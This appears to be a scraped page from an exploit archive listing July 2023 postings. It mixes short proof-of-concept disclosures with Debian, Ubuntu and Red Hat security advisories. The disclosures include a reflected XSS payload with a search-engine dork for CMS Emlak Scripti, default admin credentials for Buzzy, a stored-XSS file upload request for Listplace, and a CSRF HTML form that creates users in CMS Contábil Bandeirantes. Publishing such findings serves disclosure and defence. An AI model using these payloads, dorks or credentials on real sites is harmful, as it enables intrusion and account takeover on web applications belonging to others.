CMS Emlak Scripti version 2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS Emlak Scripti V2 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://demobul.net/emlakv2/                                                                                        |  | # Dork      : /emlakv2/kategori/                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /ara.html?ara=<ScRiPt>prompt(005605414920)</ScRiPt>[+] http://127.0.0.1/demobulnet/emlakv2/ara.html?ara=%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS Emlak Scripti 2 Cross Site Scripting

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | ef0029a51004a0f4fd1207577f144340dffe6a0657f6ace9160fd98579a7d596

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings

Listplace Directory Listing Platform version 3.0 suffers from an arbitrary file upload vulnerability that can assist in cross site scripting attacks.

    # Exploit Title: Listplace Directory Listing Platform 3.0 - Arbitrary File Upload# Exploit Author: CraCkEr# Date: 12/07/2023# Vendor: Bug Finder# Vendor Homepage: https://bugfinder.net/# Software Link: https://bugfinder.net/product/listplace-a-complete-directory-listing-platform/22# Tested on: Windows 10 Pro# Impact: Allows User to upload files to the web server## DescriptionAllows Attacker to upload malicious files onto the server, such as Stored XSS## Steps to Reproduce:1. Login as a [Normal User]2. In [User Dashboard] go to [Profile Settings] on this Path: https://website/listplace/user/profile3. Upload any Image to [User_Cover_Photo]4. Capture the POST Request with [Burp Proxy Intercept]5. Inject your [Evil-Code] or [Stored XSS] -----------------------------------------------------------POST /listplace/user/coverPhotoUpdate HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="user_cover_photo"; filename="XSS.png"Content-Type: image/png<script>alert(1)</script>-----------------------------------------------------------6. Send the Request7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]8. Access your Uploded Evil file on this Path: https://website/listplace/assets/uploads/users/[Stored-XSS][-] Done

Listplace Directory Listing Platform 3.0 File Upload / Cross Site Scripting

CMS Contabil Bandeirantes version 1.0.0 suffers from a cross site request forgery vulnerability.

======================================================================================================================================  
| # Title     : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                            |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              |  
| # Vendor    : https://scriptmafia.org/                                                                                             |    
======================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine .

[+] Go to the line 12.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/addUser.php 

[+] Save code as poc.html 

<section id="main" class="column" style="height: 680px;">

        <h4 class="alert_info">Necessário preencher todos os campos.</h4>  
        

        <article class="module width_full">  
      <form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">  
        <header><h3>Adicionar Usuários</h3></header>

                      <div class="module_content">  
                <fieldset>  
                  <label>Nome</label>  
                  <input name="nome" id="nome" value="" type="text">  
                </fieldset>  
                <fieldset>  
                  <label>Email</label>  
                  <input name="email" id="email" value="" type="text">  
                </fieldset>  
                <fieldset>  
                  <label>Senha</label>  
                  <input name="senha" id="senha" value="" type="text">  
                </fieldset>  
                <div class="clear"></div>  
            </div>    
        <footer>  
          <div class="submit_link">  
            <input id="limpar" name="limpar" value="limpar" type="submit">  
            <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">  
          </div>  
        </footer>  
      </form>    
    </article>

                    <div class="spacer"></div>  
  </section>

  Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

CMS Contabil Bandeirantes 1.0.0 Cross Site Request Forgery

Debian Linux Security Advisory 5456-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5456-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 20, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-3727 CVE-2023-3728 CVE-2023-3730 CVE-2023-3732                  CVE-2023-3733 CVE-2023-3734 CVE-2023-3735 CVE-2023-3736                  CVE-2023-3737 CVE-2023-3738 CVE-2023-3740Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 115.0.5790.98-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.0.5790.98-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmS5GUwACgkQEMKTtsN8TjbbTQ/+JTOxjogNUPA3QsV16IWwpWLkSoQkfVxKbreF8i5OC/FRN/nWdvH0gN8ZJI0f9UKhAjaSVAlQ9j4K7L54V4uEXuNWrnNtRDJx24RS6oZ5Wmd301IC0My1qpTRic3vd8Rfc7J9B1lvae9fNAmQlG11X090Pg3nxgaHNWF0qzh4HZcb97rp/TLBmuQLTjnB7jM9y/IBZxKQwoZXGERRWV5UGkp1YtJgNizZhlwkG6MpP6erSFrWOpMokEU44N0WWZKXoZr2xGkc7XIrAumJ5b5+1y+kjCBUVfrnNZl14T+LMz8k45CuDvfCq7FFfDhpS7z/Rrb0SsepBKwzSHB54nmexCLbtkycExwGQ2C5KLNtmjL435V2D65iaCsBdceMtqlGFsGgjZIY2wcYYdSh1lLGqKseoHKGrnSLpwAEuG/Lj+51IQFZ4n1erVCuBbObmWTySoU/cwWmryelWbo9ILiME2y2BwGTYiW1+VGndPBUwG9jgswaFf3Oo9VTSD/olDaD9CbtrnIHS/HrrCLtopDoYqLYcyrQzh++JV5pLkJQD7q90kApBKpw/iI2qVmlHCPUNjAK5AqYS/BDe6XC2rju0+dOyoZ8oSAhzusihLCHhbxYrjpNck8qy+7Zn4XvY5mWXQmfBpf+7o6s5S586Zhd9rsdtgMqBViRWUacSX82Q7I==Hx+R-----END PGP SIGNATURE-----

Debian Security Advisory 5456-1

Ubuntu Security Notice 6239-1 - It was discovered that ECDSA Util did not properly verify certain signature values. An attacker could possibly use this issue to bypass signature verification.

==========================================================================  
Ubuntu Security Notice USN-6239-1  
July 20, 2023

ecdsautils vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

ECDSA Util could be made to accept forged signatures.

Software Description:  
- ecdsautils: ECDSA elliptic curve cryptography command line tools

Details:

It was discovered that ECDSA Util did not properly verify certain  
signature values.  
An attacker could possibly use this issue to bypass signature  
verification.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   ecdsautils 0.3.2+git20151018-2+deb10u1build0.22.04.1

Ubuntu 20.04 LTS:  
   ecdsautils 0.3.2+git20151018-2+deb10u1build0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   ecdsautils 0.3.2+git20151018-2ubuntu0.18.04.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   ecdsautils 0.3.2+git20151018-2ubuntu0.16.04.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6239-1  
   CVE-2022-24884

Package Information:  
https://launchpad.net/ubuntu/+source/ecdsautils/0.3.2+git20151018-2+deb10u1build0.22.04.1  
https://launchpad.net/ubuntu/+source/ecdsautils/0.3.2+git20151018-2+deb10u1build0.20.04.1

Ubuntu Security Notice USN-6239-1

The PKCS#11 feature in ssh-agent in OpenSSH versions prior to 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system.

OpenSSH Forwarded SSH-Agent Remote Code Execution

Red Hat Security Advisory 2023-4158-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit. Issues addressed include denial of service and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-11-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:4158-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4158  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22006 CVE-2023-22036 CVE-2023-22041   
                   CVE-2023-22045 CVE-2023-22049 CVE-2023-25193   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: ZIP file parsing infinite loop (8302483) (CVE-2023-22036)

* OpenJDK: weakness in AES implementation (8308682) (CVE-2023-22041)

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* harfbuzz: OpenJDK: O(n^2) growth via consecutive marks (CVE-2023-25193)

* OpenJDK: HTTP client insufficient file name validation (8302475)  
(CVE-2023-22006)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Prepare for the next quarterly OpenJDK upstream release (2023-07,  
11.0.20) [rhel-9] (BZ#2223100)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2167254 - CVE-2023-25193 harfbuzz: OpenJDK: O(n^2) growth via consecutive marks  
2221619 - OpenJDK: font processing denial of service vulnerability (8301998)  
2221626 - CVE-2023-22006 OpenJDK: HTTP client insufficient file name validation (8302475)  
2221634 - CVE-2023-22036 OpenJDK: ZIP file parsing infinite loop (8302483)  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)  
2223100 - Prepare for the next quarterly OpenJDK upstream release (2023-07, 11.0.20) [rhel-9] [rhel-9.2.0.z]  
2223207 - CVE-2023-22041 OpenJDK: weakness in AES implementation (8308682)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
java-11-openjdk-11.0.20.0.8-2.el9.src.rpm

aarch64:  
java-11-openjdk-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-demo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-devel-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-headless-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-javadoc-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-jmods-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-src-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-static-libs-11.0.20.0.8-2.el9.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-demo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-devel-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-headless-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-jmods-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-src-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.20.0.8-2.el9.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-demo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-devel-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-headless-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-javadoc-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-jmods-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-src-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-static-libs-11.0.20.0.8-2.el9.s390x.rpm

x86_64:  
java-11-openjdk-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-demo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-devel-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-headless-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-javadoc-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-jmods-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-src-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-static-libs-11.0.20.0.8-2.el9.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 9):

aarch64:  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.20.0.8-2.el9.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.20.0.8-2.el9.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.20.0.8-2.el9.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.20.0.8-2.el9.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-slowdebug-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.20.0.8-2.el9.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.20.0.8-2.el9.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.20.0.8-2.el9.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.20.0.8-2.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTIYAAoJENzjgjWX9erEKdcQAI7hYFFkkNdmkVafzqIIM2QK  
3uiSxEwaY/Sph9qeNuiWQsEimcn1a3mU5x5lwRhu8PoW9bczlCbcDMNff1YGxB6V  
BK+fldsBmDImcTqPVZvZQsIHSqXRD6R5cylolJyjk/hzzGTW058fnS/KFjIddumL  
mj/qckdUsiB9w06m8mm4SSRnTsY/SVV9OjbHLM8zoIM0l5LVHsiG30rZJcHgnWw6  
g5PerBN7wX81X84WUzXPtswHNEyUsjcuTA0qzrkmyBpRIH4KobAz5qgpU+GdIyad  
jLBT5V+EYqMrc+tNjrqpUeQtEjujqI2NGNCgY6mzxO3i2sI+NSdfffAmHizfv/c7  
VYdV9K843ttRdNC++2UFQ/B4OvETmVMSd4bJnP50jZ/pOIzUZm3gNwIb4NdH34UV  
pcs7YQQQZCcTRgf86+jxf00WN8jvLB7aXWf1hIqqc622VV1b5Rj7803zjLMuuLgA  
mjl/ZY6UgZsdc3iXFrMjxUxn1NF26LLsViBvTshGUh2vE0Z1uqohkMv+IpPZKLR+  
O4yaasggPkI92rfSIkDDRWJ7OmzUGFCPT1mGdtrsbu1vNJ5sGddg6zfl50iK+nuP  
JDuCEqgQbKpxK8FR2P6SGRstWiVS9PxUe3U9y0fwvfn112MaMCXLWIdJ4MfNSZHP  
GMXuWW/KkIRiGsSwNp4i  
=Lv9v  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4158-01

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.88

Ubuntu Security Notice 6237-2 - USN-6237-1 fixed vulnerabilities in curl. The update caused a certificate wildcard handling regression on Ubuntu 22.04 LTS. This update fixes the problem. Hiroki Kurosawa discovered that curl incorrectly handled validating certain certificate wildcards. A remote attacker could possibly use this issue to spoof certain website certificates using IDN hosts. Hiroki Kurosawa discovered that curl incorrectly handled callbacks when certain options are set by applications. This could cause applications using curl to misbehave, resulting in information disclosure, or a denial of service. It was discovered that curl incorrectly handled saving cookies to files. A local attacker could possibly use this issue to create or overwrite files. This issue only affected Ubuntu 22.10, and Ubuntu 23.04.

